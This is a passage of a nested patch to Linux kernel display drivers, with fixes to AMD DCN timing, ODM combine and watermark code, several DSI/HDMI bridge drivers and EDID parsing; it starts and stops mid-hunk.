+ 	SF(OTG0_OTG_DRR_V_TOTAL_CHANGE, OTG_DRR_V_TOTAL_CHANGE_LIMIT, mask_sh),\
+ 	SF(OTG0_OTG_H_TIMING_CNTL, OTG_H_TIMING_DIV_MODE, mask_sh),\
++	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_PENDING, mask_sh),\
+ 	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_MODE, mask_sh)
+ 
+ void dcn30_timing_generator_init(struct optc *optc1);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c
+index 38842f938bed0..0926db0183383 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c
+@@ -278,10 +278,10 @@ static void enc314_stream_encoder_dp_blank(
+ 	struct dc_link *link,
+ 	struct stream_encoder *enc)
+ {
+-	/* New to DCN314 - disable the FIFO before VID stream disable. */
+-	enc314_disable_fifo(enc);
+-
+ 	enc1_stream_encoder_dp_blank(link, enc);
++
++	/* Disable FIFO after the DP vid stream is disabled to avoid corruption. */
++	enc314_disable_fifo(enc);
+ }
+ 
+ static void enc314_stream_encoder_dp_unblank(
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index c80c8c8f51e97..9918bccd6defb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -888,6 +888,8 @@ static const struct dc_debug_options debug_defaults_drv = {
+ 	.force_abm_enable = false,
+ 	.timing_trace = false,
+ 	.clock_trace = true,
++	.disable_dpp_power_gate = true,
++	.disable_hubp_power_gate = true,
+ 	.disable_pplib_clock_request = false,
+ 	.pipe_split_policy = MPC_SPLIT_DYNAMIC,
+ 	.force_single_disp_pipe_split = false,
+@@ -897,7 +899,7 @@ static const struct dc_debug_options debug_defaults_drv = {
+ 	.max_downscale_src_width = 4096,/*upto true 4k*/
+ 	.disable_pplib_wm_range = false,
+ 	.scl_reset_length10 = true,
+-	.sanity_checks = false,
++	.sanity_checks = true,
+ 	.underflow_assert_delay_us = 0xFFFFFFFF,
+ 	.dwb_fi_phase = -1, // -1 = disable,
+ 	.dmub_command_table = true,
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c
+index d3b5b6fedf042..6266b0788387e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c
+@@ -3897,14 +3897,14 @@ void dml20_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 					mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine = mode_lib->vba.PixelClock[k] / 2
+ 							* (1 + mode_lib->vba.DISPCLKDPPCLKDSCCLKDownSpreading / 100.0);
+ 
+-				locals->ODMCombineEnablePerState[i][k] = false;
++				locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 				mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithoutODMCombine;
+ 				if (mode_lib->vba.ODMCapability) {
+ 					if (locals->PlaneRequiredDISPCLKWithoutODMCombine > mode_lib->vba.MaxDispclkRoundedDownToDFSGranularity) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->HActive[k] > DCN20_MAX_420_IMAGE_WIDTH && locals->OutputFormat[k] == dm_420) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					}
+ 				}
+@@ -3957,7 +3957,7 @@ void dml20_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 				locals->RequiredDISPCLK[i][j] = 0.0;
+ 				locals->DISPCLK_DPPCLK_Support[i][j] = true;
+ 				for (k = 0; k <= mode_lib->vba.NumberOfActivePlanes - 1; k++) {
+-					locals->ODMCombineEnablePerState[i][k] = false;
++					locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 					if (locals->SwathWidthYSingleDPP[k] <= locals->MaximumSwathWidth[k]) {
+ 						locals->NoOfDPP[i][j][k] = 1;
+ 						locals->RequiredDPPCLK[i][j][k] = locals->MinDPPCLKUsingSingleDPP[k]
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c
+index edd098c7eb927..989d83ee38421 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c
+@@ -4008,17 +4008,17 @@ void dml20v2_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode
+ 					mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine = mode_lib->vba.PixelClock[k] / 2
+ 							* (1 + mode_lib->vba.DISPCLKDPPCLKDSCCLKDownSpreading / 100.0);
+ 
+-				locals->ODMCombineEnablePerState[i][k] = false;
++				locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 				mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithoutODMCombine;
+ 				if (mode_lib->vba.ODMCapability) {
+ 					if (locals->PlaneRequiredDISPCLKWithoutODMCombine > MaxMaxDispclkRoundedDown) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->DSCEnabled[k] && (locals->HActive[k] > DCN20_MAX_DSC_IMAGE_WIDTH)) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->HActive[k] > DCN20_MAX_420_IMAGE_WIDTH && locals->OutputFormat[k] == dm_420) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					}
+ 				}
+@@ -4071,7 +4071,7 @@ void dml20v2_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode
+ 				locals->RequiredDISPCLK[i][j] = 0.0;
+ 				locals->DISPCLK_DPPCLK_Support[i][j] = true;
+ 				for (k = 0; k <= mode_lib->vba.NumberOfActivePlanes - 1; k++) {
+-					locals->ODMCombineEnablePerState[i][k] = false;
++					locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 					if (locals->SwathWidthYSingleDPP[k] <= locals->MaximumSwathWidth[k]) {
+ 						locals->NoOfDPP[i][j][k] = 1;
+ 						locals->RequiredDPPCLK[i][j][k] = locals->MinDPPCLKUsingSingleDPP[k]
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c b/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
+index 1d84ae50311d9..b7c2844d0cbee 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
+@@ -4102,17 +4102,17 @@ void dml21_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 					mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine = mode_lib->vba.PixelClock[k] / 2
+ 							* (1 + mode_lib->vba.DISPCLKDPPCLKDSCCLKDownSpreading / 100.0);
+ 
+-				locals->ODMCombineEnablePerState[i][k] = false;
++				locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 				mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithoutODMCombine;
+ 				if (mode_lib->vba.ODMCapability) {
+ 					if (locals->PlaneRequiredDISPCLKWithoutODMCombine > MaxMaxDispclkRoundedDown) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->DSCEnabled[k] && (locals->HActive[k] > DCN21_MAX_DSC_IMAGE_WIDTH)) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->HActive[k] > DCN21_MAX_420_IMAGE_WIDTH && locals->OutputFormat[k] == dm_420) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					}
+ 				}
+@@ -4165,7 +4165,7 @@ void dml21_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 				locals->RequiredDISPCLK[i][j] = 0.0;
+ 				locals->DISPCLK_DPPCLK_Support[i][j] = true;
+ 				for (k = 0; k <= mode_lib->vba.NumberOfActivePlanes - 1; k++) {
+-					locals->ODMCombineEnablePerState[i][k] = false;
++					locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 					if (locals->SwathWidthYSingleDPP[k] <= locals->MaximumSwathWidth[k]) {
+ 						locals->NoOfDPP[i][j][k] = 1;
+ 						locals->RequiredDPPCLK[i][j][k] = locals->MinDPPCLKUsingSingleDPP[k]
+@@ -5230,7 +5230,7 @@ void dml21_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 			mode_lib->vba.ODMCombineEnabled[k] =
+ 					locals->ODMCombineEnablePerState[mode_lib->vba.VoltageLevel][k];
+ 		} else {
+-			mode_lib->vba.ODMCombineEnabled[k] = false;
++			mode_lib->vba.ODMCombineEnabled[k] = dm_odm_combine_mode_disabled;
+ 		}
+ 		mode_lib->vba.DSCEnabled[k] =
+ 				locals->RequiresDSC[mode_lib->vba.VoltageLevel][k];
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index d90216d2fe3a8..04cc96e700981 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -1963,6 +1963,10 @@ void dcn32_calculate_wm_and_dlg_fpu(struct dc *dc, struct dc_state *context,
+ 		 */
+ 		context->bw_ctx.bw.dcn.watermarks.a = context->bw_ctx.bw.dcn.watermarks.c;
+ 		context->bw_ctx.bw.dcn.watermarks.a.cstate_pstate.pstate_change_ns = 0;
++		/* Calculate FCLK p-state change watermark based on FCLK pstate change latency in case
++		 * UCLK p-state is not supported, to avoid underflow in case FCLK pstate is supported
++		 */
++		context->bw_ctx.bw.dcn.watermarks.a.cstate_pstate.fclk_pstate_change_ns = get_fclk_watermark(&context->bw_ctx.dml, pipes, pipe_cnt) * 1000;
+ 	} else {
+ 		/* Set A:
+ 		 * All clocks min.
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+index f4b176599be7a..0ea406145c1d7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+@@ -136,7 +136,7 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_21_soc = {
+ 	.urgent_out_of_order_return_per_channel_pixel_only_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_pixel_and_vm_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_vm_only_bytes = 4096,
+-	.pct_ideal_sdp_bw_after_urgent = 100.0,
++	.pct_ideal_sdp_bw_after_urgent = 90.0,
+ 	.pct_ideal_fabric_bw_after_urgent = 67.0,
+ 	.pct_ideal_dram_sdp_bw_after_urgent_pixel_only = 20.0,
+ 	.pct_ideal_dram_sdp_bw_after_urgent_pixel_and_vm = 60.0, // N/A, for now keep as is until DML implemented
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c b/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c
+index 9b63c6c0cc844..e0bd0c722e006 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c
++++ b/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c
+@@ -138,7 +138,8 @@ static const struct ddc_sh_mask ddc_shift[] = {
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 3),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 4),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 5),
+-	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6)
++	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(__SHIFT)
+ };
+ 
+ static const struct ddc_sh_mask ddc_mask[] = {
+@@ -147,7 +148,8 @@ static const struct ddc_sh_mask ddc_mask[] = {
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 3),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 4),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 5),
+-	DDC_MASK_SH_LIST_DCN2(_MASK, 6)
++	DDC_MASK_SH_LIST_DCN2(_MASK, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(_MASK)
+ };
+ 
+ #include "../generic_regs.h"
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c b/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c
+index 687d4f128480e..36a5736c58c92 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c
++++ b/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c
+@@ -145,7 +145,8 @@ static const struct ddc_sh_mask ddc_shift[] = {
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 3),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 4),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 5),
+-	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6)
++	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(__SHIFT)
+ };
+ 
+ static const struct ddc_sh_mask ddc_mask[] = {
+@@ -154,7 +155,8 @@ static const struct ddc_sh_mask ddc_mask[] = {
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 3),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 4),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 5),
+-	DDC_MASK_SH_LIST_DCN2(_MASK, 6)
++	DDC_MASK_SH_LIST_DCN2(_MASK, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(_MASK)
+ };
+ 
+ #include "../generic_regs.h"
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c b/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c
+index 0ea52ba5ac827..9f6872ae40203 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c
++++ b/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c
+@@ -149,7 +149,8 @@ static const struct ddc_sh_mask ddc_shift[] = {
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 3),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 4),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 5),
+-	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6)
++	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(__SHIFT)
+ };
+ 
+ static const struct ddc_sh_mask ddc_mask[] = {
+@@ -158,7 +159,8 @@ static const struct ddc_sh_mask ddc_mask[] = {
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 3),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 4),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 5),
+-	DDC_MASK_SH_LIST_DCN2(_MASK, 6)
++	DDC_MASK_SH_LIST_DCN2(_MASK, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(_MASK)
+ };
+ 
+ #include "../generic_regs.h"
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h b/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h
+index 308a543178a56..59884ef651b39 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h
++++ b/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h
+@@ -113,6 +113,13 @@
+ 	(PHY_AUX_CNTL__AUX## cd ##_PAD_RXSEL## mask_sh),\
+ 	(DC_GPIO_AUX_CTRL_5__DDC_PAD## cd ##_I2CMODE## mask_sh)}
+ 
++#define DDC_MASK_SH_LIST_DCN2_VGA(mask_sh) \
++	{DDC_MASK_SH_LIST_COMMON(mask_sh),\
++	0,\
++	0,\
++	0,\
++	0}
++
+ struct ddc_registers {
+ 	struct gpio_registers gpio;
+ 	uint32_t ddc_setup;
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h b/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
+index 25a1df45b2641..f96fb425345e4 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
+@@ -325,6 +325,7 @@ struct timing_generator_funcs {
+ 			uint32_t vtotal_change_limit);
+ 
+ 	void (*init_odm)(struct timing_generator *tg);
++	void (*wait_drr_doublebuffer_pending_clear)(struct timing_generator *tg);
+ };
+ 
+ #endif
+diff --git a/drivers/gpu/drm/bridge/lontium-lt9611.c b/drivers/gpu/drm/bridge/lontium-lt9611.c
+index 7c0a99173b39f..3b77238ca4aff 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt9611.c
++++ b/drivers/gpu/drm/bridge/lontium-lt9611.c
+@@ -187,12 +187,14 @@ static void lt9611_mipi_video_setup(struct lt9611 *lt9611,
+ 
+ 	regmap_write(lt9611->regmap, 0x8319, (u8)(hfront_porch % 256));
+ 
+-	regmap_write(lt9611->regmap, 0x831a, (u8)(hsync_porch / 256));
++	regmap_write(lt9611->regmap, 0x831a, (u8)(hsync_porch / 256) |
++						((hfront_porch / 256) << 4));
+ 	regmap_write(lt9611->regmap, 0x831b, (u8)(hsync_porch % 256));
+ }
+ 
+-static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode)
++static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode, unsigned int postdiv)
+ {
++	unsigned int pcr_m = mode->clock * 5 * postdiv / 27000;
+ 	const struct reg_sequence reg_cfg[] = {
+ 		{ 0x830b, 0x01 },
+ 		{ 0x830c, 0x10 },
+@@ -207,7 +209,6 @@ static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mod
+ 
+ 		/* stage 2 */
+ 		{ 0x834a, 0x40 },
+-		{ 0x831d, 0x10 },
+ 
+ 		/* MK limit */
+ 		{ 0x832d, 0x38 },
+@@ -222,30 +223,28 @@ static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mod
+ 		{ 0x8325, 0x00 },
+ 		{ 0x832a, 0x01 },
+ 		{ 0x834a, 0x10 },
+-		{ 0x831d, 0x10 },
+-		{ 0x8326, 0x37 },
+ 	};
++	u8 pol = 0x10;
+ 
+-	regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
++	if (mode->flags & DRM_MODE_FLAG_NHSYNC)
++		pol |= 0x2;
++	if (mode->flags & DRM_MODE_FLAG_NVSYNC)
++		pol |= 0x1;
++	regmap_write(lt9611->regmap, 0x831d, pol);
+ 
+-	switch (mode->hdisplay) {
+-	case 640:
+-		regmap_write(lt9611->regmap, 0x8326, 0x14);
+-		break;
+-	case 1920:
+-		regmap_write(lt9611->regmap, 0x8326, 0x37);
+-		break;
+-	case 3840:
++	if (mode->hdisplay == 3840)
+ 		regmap_multi_reg_write(lt9611->regmap, reg_cfg2, ARRAY_SIZE(reg_cfg2));
+-		break;
+-	}
++	else
++		regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
++
++	regmap_write(lt9611->regmap, 0x8326, pcr_m);
+ 
+ 	/* pcr rst */
+ 	regmap_write(lt9611->regmap, 0x8011, 0x5a);
+ 	regmap_write(lt9611->regmap, 0x8011, 0xfa);
+ }
+ 
+-static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode)
++static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode, unsigned int *postdiv)
+ {
+ 	unsigned int pclk = mode->clock;
+ 	const struct reg_sequence reg_cfg[] = {
+@@ -263,12 +262,16 @@ static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode
+ 
+ 	regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
+ 
+-	if (pclk > 150000)
++	if (pclk > 150000) {
+ 		regmap_write(lt9611->regmap, 0x812d, 0x88);
+-	else if (pclk > 70000)
++		*postdiv = 1;
++	} else if (pclk > 70000) {
+ 		regmap_write(lt9611->regmap, 0x812d, 0x99);
+-	else
++		*postdiv = 2;
++	} else {
+ 		regmap_write(lt9611->regmap, 0x812d, 0xaa);
++		*postdiv = 4;
++	}
+ 
+ 	/*
+ 	 * first divide pclk by 2 first
+@@ -448,12 +451,11 @@ static void lt9611_sleep_setup(struct lt9611 *lt9611)
+ 		{ 0x8023, 0x01 },
+ 		{ 0x8157, 0x03 }, /* set addr pin as output */
+ 		{ 0x8149, 0x0b },
+-		{ 0x8151, 0x30 }, /* disable IRQ */
++
+ 		{ 0x8102, 0x48 }, /* MIPI Rx power down */
+ 		{ 0x8123, 0x80 },
+ 		{ 0x8130, 0x00 },
+-		{ 0x8100, 0x01 }, /* bandgap power down */
+-		{ 0x8101, 0x00 }, /* system clk power down */
++		{ 0x8011, 0x0a },
+ 	};
+ 
+ 	regmap_multi_reg_write(lt9611->regmap,
+@@ -767,7 +769,7 @@ static const struct drm_connector_funcs lt9611_bridge_connector_funcs = {
+ static struct mipi_dsi_device *lt9611_attach_dsi(struct lt9611 *lt9611,
+ 						 struct device_node *dsi_node)
+ {
+-	const struct mipi_dsi_device_info info = { "lt9611", 0, NULL };
++	const struct mipi_dsi_device_info info = { "lt9611", 0, lt9611->dev->of_node};
+ 	struct mipi_dsi_device *dsi;
+ 	struct mipi_dsi_host *host;
+ 	struct device *dev = lt9611->dev;
+@@ -857,12 +859,18 @@ static enum drm_mode_status lt9611_bridge_mode_valid(struct drm_bridge *bridge,
+ static void lt9611_bridge_pre_enable(struct drm_bridge *bridge)
+ {
+ 	struct lt9611 *lt9611 = bridge_to_lt9611(bridge);
++	static const struct reg_sequence reg_cfg[] = {
++		{ 0x8102, 0x12 },
++		{ 0x8123, 0x40 },
++		{ 0x8130, 0xea },
++		{ 0x8011, 0xfa },
++	};
+ 
+ 	if (!lt9611->sleep)
+ 		return;
+ 
+-	lt9611_reset(lt9611);
+-	regmap_write(lt9611->regmap, 0x80ee, 0x01);
++	regmap_multi_reg_write(lt9611->regmap,
++			       reg_cfg, ARRAY_SIZE(reg_cfg));
+ 
+ 	lt9611->sleep = false;
+ }
+@@ -882,14 +890,15 @@ static void lt9611_bridge_mode_set(struct drm_bridge *bridge,
+ {
+ 	struct lt9611 *lt9611 = bridge_to_lt9611(bridge);
+ 	struct hdmi_avi_infoframe avi_frame;
++	unsigned int postdiv;
+ 	int ret;
+ 
+ 	lt9611_bridge_pre_enable(bridge);
+ 
+ 	lt9611_mipi_input_digital(lt9611, mode);
+-	lt9611_pll_setup(lt9611, mode);
++	lt9611_pll_setup(lt9611, mode, &postdiv);
+ 	lt9611_mipi_video_setup(lt9611, mode);
+-	lt9611_pcr_setup(lt9611, mode);
++	lt9611_pcr_setup(lt9611, mode, postdiv);
+ 
+ 	ret = drm_hdmi_avi_infoframe_from_display_mode(&avi_frame,
+ 						       &lt9611->connector,
+diff --git a/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c b/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c
+index 97359f807bfc3..cbfa05a6767b5 100644
+--- a/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c
++++ b/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c
+@@ -440,7 +440,11 @@ static int __init stdpxxxx_ge_b850v3_init(void)
+ 	if (ret)
+ 		return ret;
+ 
+-	return i2c_add_driver(&stdp2690_ge_b850v3_fw_driver);
++	ret = i2c_add_driver(&stdp2690_ge_b850v3_fw_driver);
++	if (ret)
++		i2c_del_driver(&stdp4028_ge_b850v3_fw_driver);
++
++	return ret;
+ }
+ module_init(stdpxxxx_ge_b850v3_init);
+ 
+diff --git a/drivers/gpu/drm/bridge/tc358767.c b/drivers/gpu/drm/bridge/tc358767.c
+index 2a58eb271f701..b9b681086fc49 100644
+--- a/drivers/gpu/drm/bridge/tc358767.c
++++ b/drivers/gpu/drm/bridge/tc358767.c
+@@ -1264,10 +1264,10 @@ static int tc_dsi_rx_enable(struct tc_data *tc)
+ 	u32 value;
+ 	int ret;
+ 
+-	regmap_write(tc->regmap, PPI_D0S_CLRSIPOCOUNT, 5);
+-	regmap_write(tc->regmap, PPI_D1S_CLRSIPOCOUNT, 5);
+-	regmap_write(tc->regmap, PPI_D2S_CLRSIPOCOUNT, 5);
+-	regmap_write(tc->regmap, PPI_D3S_CLRSIPOCOUNT, 5);
++	regmap_write(tc->regmap, PPI_D0S_CLRSIPOCOUNT, 25);
++	regmap_write(tc->regmap, PPI_D1S_CLRSIPOCOUNT, 25);
++	regmap_write(tc->regmap, PPI_D2S_CLRSIPOCOUNT, 25);
++	regmap_write(tc->regmap, PPI_D3S_CLRSIPOCOUNT, 25);
+ 	regmap_write(tc->regmap, PPI_D0S_ATMR, 0);
+ 	regmap_write(tc->regmap, PPI_D1S_ATMR, 0);
+ 	regmap_write(tc->regmap, PPI_TX_RX_TA, TTA_GET | TTA_SURE);
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi83.c b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+index 7ba9467fff129..047c14ddbbf11 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi83.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+@@ -346,7 +346,7 @@ static void sn65dsi83_atomic_enable(struct drm_bridge *bridge,
+ 
+ 	/* Deassert reset */
+ 	gpiod_set_value_cansleep(ctx->enable_gpio, 1);
+-	usleep_range(1000, 1100);
++	usleep_range(10000, 11000);
+ 
+ 	/* Get the LVDS format from the bridge state. */
+ 	bridge_state = drm_atomic_get_new_bridge_state(state, bridge);
+diff --git a/drivers/gpu/drm/drm_edid.c b/drivers/gpu/drm/drm_edid.c
+index 9d82de4c0a8b0..739e0d40cca61 100644
+--- a/drivers/gpu/drm/drm_edid.c
++++ b/drivers/gpu/drm/drm_edid.c
+@@ -5093,13 +5093,12 @@ static int add_cea_modes(struct drm_connector *connector,
+ {
+ 	const struct cea_db *db;
+ 	struct cea_db_iter iter;
++	const u8 *hdmi = NULL, *video = NULL;
++	u8 hdmi_len = 0, video_len = 0;
+ 	int modes = 0;
+ 
+ 	cea_db_iter_edid_begin(drm_edid, &iter);
+ 	cea_db_iter_for_each(db, &iter) {
+-		const u8 *hdmi = NULL, *video = NULL;
+-		u8 hdmi_len = 0, video_len = 0;
+-
+ 		if (cea_db_tag(db) == CTA_DB_VIDEO) {
+ 			video = cea_db_data(db);
+ 			video_len = cea_db_payload_len(db);
+@@ -5115,18 +5114,17 @@ static int add_cea_modes(struct drm_connector *connector,
+ 			modes += do_y420vdb_modes(connector, vdb420,
+ 						  cea_db_payload_len(db) - 1);
+ 		}
+-
+-		/*
